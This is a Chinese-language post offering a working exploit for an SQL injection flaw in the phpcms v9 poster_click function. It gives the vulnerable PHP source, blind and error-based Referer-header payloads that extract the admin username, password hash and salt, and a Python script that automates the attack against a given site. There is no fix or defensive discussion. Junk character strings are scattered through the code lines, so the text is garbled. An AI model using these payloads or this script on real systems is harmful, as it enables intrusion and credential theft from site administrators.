有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
8 F. n* O* R' t; w+ K* r8 @& O! Y0 A1 Z! s% F `
问题函数\phpcms\modules\poster\index.php3 n* h7 \1 x* R3 U5 m" I% R
5 Q% K1 l# g, y5 B( h5 ?; qpublic function poster_click() {& D) C. ?; s2 a1 M; n
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
6 Q9 l1 r- v ~3 q# |; ?$r = $this->db->get_one(array('id'=>$id));
7 g4 {( L) Q5 P& f5 E1 ~$ o, lif (!is_array($r) && empty($r)) return false;9 y! w' y2 \0 o$ \
$ip_area = pc_base::load_sys_class('ip_area');* }2 O0 n: p( K; o$ d+ @2 Q
$ip = ip();( \2 ] @5 h4 `0 v' ~
$area = $ip_area->get($ip);' v* ]5 U8 \1 V8 k, r, K9 Z( Y; A
$username = param::get_cookie('username') ? param::get_cookie('username') : '';, O9 E- W" u/ y+ \
if($id) {) B: v5 x# H3 S7 d
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
7 a! v: s4 `; J: N) g$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));$ E6 d- O! ?2 t! S- C
}
$ [, _( C) A: g- e3 w3 k$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));' X- @9 _+ {, ~# G5 ]
$setting = string2array($r['setting']);
/ l |$ {5 Q" T/ k2 O8 I# ?$ uif (count($setting)==1) {1 ^0 f& \8 i! @4 o2 Z
$url = $setting['1']['linkurl'];
# O! d' |0 `7 w( u6 B5 r" ?2 Q$ s} else {. k- Q% R- a) \3 ]1 n2 \; @
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];' Q: X& k5 g, \( z
}
6 t$ }# C5 w0 |9 E4 u4 [2 i$ B6 Theader('Location: '.$url);
9 G5 }% J6 B d# o}4 l; Q8 N G! ?+ V& A8 {- \
. s) \5 s" e9 x2 a! ]" Z
- W: g( L5 {& W5 r- I8 Y1 k
) C8 z# h/ ~) d$ e& z, @( T! F利用方式:7 @/ l9 u+ v5 T1 @& ^( E; q$ U) U
3 c+ l" k/ ^+ C1、可以采用盲注入的手法:1 K; w# u2 j/ _, P) x" J$ Q
& b! W. J |/ m- o( ^7 Ureferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
3 g) h8 z9 q+ B
: y' V) s d5 P% }7 Z通过返回页面,正常与否一个个猜解密码字段。
' n& ?: }+ X) T2 |! P* G7 _3 u6 N5 e( k% s" `* Z
2、代码是花开写的,随手附上了:: E+ F+ c2 o; O, n) M* V
7 i6 ^; [* a" q+ @
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
% {+ B: n7 K8 m7 W# N4 y( J, v, ]5 r) I7 ~
此方法是爆错注入手法,原理自查。
; M. { b, G3 a
+ ]1 ~1 P) T2 q: h- Y# y+ Y1 D7 H `6 I! Y x* J3 T% x/ j2 H
% z1 F" `/ L- ~& n8 X2 |
利用程序:8 Z5 ~' G' i$ _- [5 U- ]$ S
' ?9 o/ x; S+ s2 T8 d
#!/usr/bin/env python
, O3 O, F) ~5 p$ I A fimport httplib,sys,re
! j/ V8 {: s5 o! U3 d- v5 O' L
. W1 }2 m7 r2 hdef attack():* V% T& \: F3 i0 o, J
print “Code by Pax.Mac Team conqu3r!”
- E7 b' b1 j0 G( b) H8 z3 ^6 S# Oprint “Welcome to our zone!!!”7 b! i0 S8 |' C3 }
url=sys.argv[1]
8 [& E: q' q" J3 w8 @# @5 s2 Vpaths=sys.argv[2]
1 @ t) g. l0 e7 Z1 K. e' dconn = httplib.HTTPConnection(url)" k1 O1 D. T" s6 K, P( J
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
; A- E9 H; b+ q7 o" w4 E* F$ t“Accept”: “text/plain”,
, h& |0 @8 p' y7 r5 a7 M“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}/ Y2 H, @! M( }8 Y, Z
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)7 B6 |- C" B6 j- T6 N4 u
r1 = conn.getresponse()% x$ H0 p8 \5 T4 a
datas=r1.read()
2 S: s2 v" J J( _9 Rdatas=re.findall(r”Duplicate entry \’\w+’”, datas)# |% c8 V8 ~! ?& Y- X5 V
print datas[0] b/ I6 S+ x1 ~- P/ G
conn.close()
! E( r# A2 K" P; F9 yif __name__==”__main__”:" u5 `4 O& H+ B6 r$ [
if len(sys.argv)<3:
" e) u' Z8 w6 g4 _- b( U, Rprint “Code by Pax.Mac Team conqu3r”5 b9 M+ y# J( k: L$ E1 U3 B
print “Usgae:”
5 \% w( P l! k6 K: g# x, ?8 G7 Tprint “ phpcmsattack.py www.paxmac.org /”
* E r! m0 P+ @4 l7 Dprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
3 J( k# G8 q9 p- Ysys.exit(1): v( d3 k- g, C1 }2 ?# p
attack()1 P) W5 {9 `) s( M, ]$ X, d9 ], O
& T2 F, K" _" Y3 ^7 N
|